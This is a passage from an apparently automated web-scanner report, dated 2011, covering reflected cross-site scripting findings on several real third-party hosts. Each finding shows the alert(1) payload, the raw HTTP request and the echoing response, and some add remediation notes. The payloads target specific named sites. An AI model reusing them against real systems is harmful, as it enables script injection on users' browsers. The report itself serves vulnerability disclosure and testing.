The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload 31f0b<script>alert(1)</script>51e1e21b763 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/youtube?maxwidth=32&maxheight=32&mode=fillcrop31f0b<script>alert(1)</script>51e1e21b763 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:31 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:32 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:31Z;0035
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop31f0b<script>alert(1)</script>51e1e21b763"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop31f0b<script>
...[SNIP]...

2.67. http://apptap.scripps.com/apptap3 [app parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the app request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 250f0'%3balert(1)//3099540a5f4 was submitted in the app parameter. This input was echoed as 250f0';alert(1)//3099540a5f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff250f0'%3balert(1)//3099540a5f4&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48363


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF250F0';ALERT(1)//3099540A5F4' ;
            //ref = document.ref
...[SNIP]...
ers' latest work"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF250F0';ALERT(1)//3099540A5F4" /* app */

s.prop16="Entertainment (NPC)" /* topic */
s.prop20="" /* gender */
s.prop21="" /* age */
s.prop22="" /* city */
s.prop23="" /* state */
s.prop24="" /* zip */

s.prop30="ECP"
...[SNIP]...

2.68. http://apptap.scripps.com/apptap3 [app parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the app request parameter is copied into a JavaScript rest-of-line comment. The payload 4b22f%0aalert(1)//da968e7ee99 was submitted in the app parameter. This input was echoed as 4b22f
alert(1)//da968e7ee99
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff4b22f%0aalert(1)//da968e7ee99&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48361


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF4B22F
ALERT(1)//DA968E7EE99
' ;
            //ref = document.referrer ;
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t();if(s_code)document.write(s_code);
   //if(navigator.appVersion.index
...[SNIP]...

2.69. http://apptap.scripps.com/apptap3 [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the path request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a0736%3balert(1)//c6592984475 was submitted in the path parameter. This input was echoed as a0736;alert(1)//c6592984475 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-pppppa0736%3balert(1)//c6592984475&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48334


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
return h;
}

function __addSlashes(n){
   var p = /[']/g;
   c = n.replace(p,"\'");
   p = /["]/g;
   c = c.replace(p,'\"');
   return c
}


var path = "ENTERTAINMENT/LOCAL/ARTICLE/HEDER-HERE-IN-THIS-SPP-PPPPPA0736;ALERT(1)//C6592984475"
var search_terms = ''

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2010 Omniture, Inc. More info available at
http://www.omniture.com */
/* You may give each page an identifying name, server
...[SNIP]...

2.70. http://apptap.scripps.com/apptap3 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the site request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 807ab%3balert(1)//eaad520ff04 was submitted in the site parameter. This input was echoed as 807ab;alert(1)//eaad520ff04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP807ab%3balert(1)//eaad520ff04&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48362


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
op6 = chunk
           if( vidx == 3 ) s.prop7 = chunk
           if( vidx == 4 ) s.prop8 = chunk
           if( vidx == 5 ) s.prop9 = chunk
           h1chunks.push( chunk )
       }
   }
   s.hier1 = h1chunks.join( ":" ) ;
   s.prop19 = "ECP807AB;ALERT(1)//EAAD520FF04:" + s.hier1 ;
   s.hier2= s.hier1

s.prop10 = '' || document.location.href.replace( /\?.*$/, '' ) ;
s.prop10 = s.prop10.replace( /https?:\/\//, '' ) ;
   s.prop10 = s.prop10.replace( /^ww
...[SNIP]...

2.71. http://apptap.scripps.com/apptap3 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa207'-alert(1)-'da0583d3123 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECPaa207'-alert(1)-'da0583d3123&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48364


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
);
}

sc_target( path, "Friday 13th double feature screens local filmmakers' latest work"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECPAA207'-ALERT(1)-'DA0583D3123" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

s.prop16="Entertainment (NPC)" /* topic */
s.prop20="" /* gender */
s.prop21="" /* age */
s.prop22="" /*
...[SNIP]...

2.72. http://apptap.scripps.com/apptap3 [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the title request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1d142%3balert(1)//79efcb08617 was submitted in the title parameter. This input was echoed as 1d142;alert(1)//79efcb08617 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=1d142%3balert(1)//79efcb08617&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:01 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48270


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
(mediaName,mediaOffset);
}
function sc_mediaStop(mediaName,mediaOffset){
s.Media.stop(mediaName,mediaOffset);
}
function sc_mediaClose(mediaName){
s.Media.close(mediaName);
}

sc_target( path, "1d142;alert(1)//79efcb08617"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

...[SNIP]...

2.73. http://apptap.scripps.com/apptap3 [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b36f2'%3balert(1)//989b401414d was submitted in the title parameter. This input was echoed as b36f2';alert(1)//989b401414d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20workb36f2'%3balert(1)//989b401414d&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48335


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
Offset){
s.Media.stop(mediaName,mediaOffset);
}
function sc_mediaClose(mediaName){
s.Media.close(mediaName);
}

sc_target( path, "Friday 13th double feature screens local filmmakers' latest workb36f2';alert(1)//989b401414d"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

...[SNIP]...

2.74. http://apptap.scripps.com/apptap3 [topic parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23503'-alert(1)-'9f9ccb9ac54 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%2923503'-alert(1)-'9f9ccb9ac54 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:01 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48363


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

s.prop16="Entertainment (NPC)23503'-alert(1)-'9f9ccb9ac54" /* topic */
s.prop20="" /* gender */
s.prop21="" /* age */
s.prop22="" /* city */
s.prop23="" /* state */
s.prop24="" /* zip */

s.prop30="ECP" /* Business Unit */


s.prop43="{{AUTHOR}}"
...[SNIP]...

2.75. http://apptap.scripps.com/apptap3 [topic parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the topic request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7b401%3balert(1)//eea6590349d was submitted in the topic parameter. This input was echoed as 7b401;alert(1)//eea6590349d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%297b401%3balert(1)//eea6590349d HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:01 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48361


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
ace( /\?.*$/, '' ) ;
s.prop10 = s.prop10.replace( /https?:\/\//, '' ) ;
   s.prop10 = s.prop10.replace( /^www\./, '' ) ;

s.prop14 = search_terms ;
s.prop16 = "Entertainment (NPC)7b401;alert(1)//eea6590349d"

if( window.yld_mgr && window.yld_mgr.slots ) {
s.prop44 = 1 ; // are there yahoo ads?
var qty = 0 ;
for( x in window.yld_mgr.slots ) {
qty
...[SNIP]...

2.76. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f55d4<script>alert(1)</script>861c9a51b7f was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf55d4<script>alert(1)</script>861c9a51b7f&n=ar_int_p82806590&1305206907376 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_G=method->-1,ts->1305206896; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf55d4<script>alert(1)</script>861c9a51b7f("");

2.77. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 1aacd<script>alert(1)</script>2221065b157 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=21aacd<script>alert(1)</script>2221065b157&c2=6035094&c3=&c4=&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Connection: close
Content-Length: 1234

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"21aacd<script>alert(1)</script>2221065b157", c2:"6035094", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
2.78. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 33ba2<script>alert(1)</script>13cb4f86f11 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fmashable.com%2F&c5=&c6=&c10=33ba2<script>alert(1)</script>13cb4f86f11&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:30:17 GMT
Date: Thu, 12 May 2011 13:30:17 GMT
Connection: close
Content-Length: 1255

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://mashable.com/", c5:"", c6:"", c10:"33ba2<script>alert(1)</script>13cb4f86f11", c15:"", c16:"", r:""});
2.79. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 92915<script>alert(1)</script>efbb621c20e was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=&c5=&c6=&c15=92915<script>alert(1)</script>efbb621c20e&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:56 GMT
Date: Thu, 12 May 2011 13:27:56 GMT
Connection: close
Content-Length: 3588

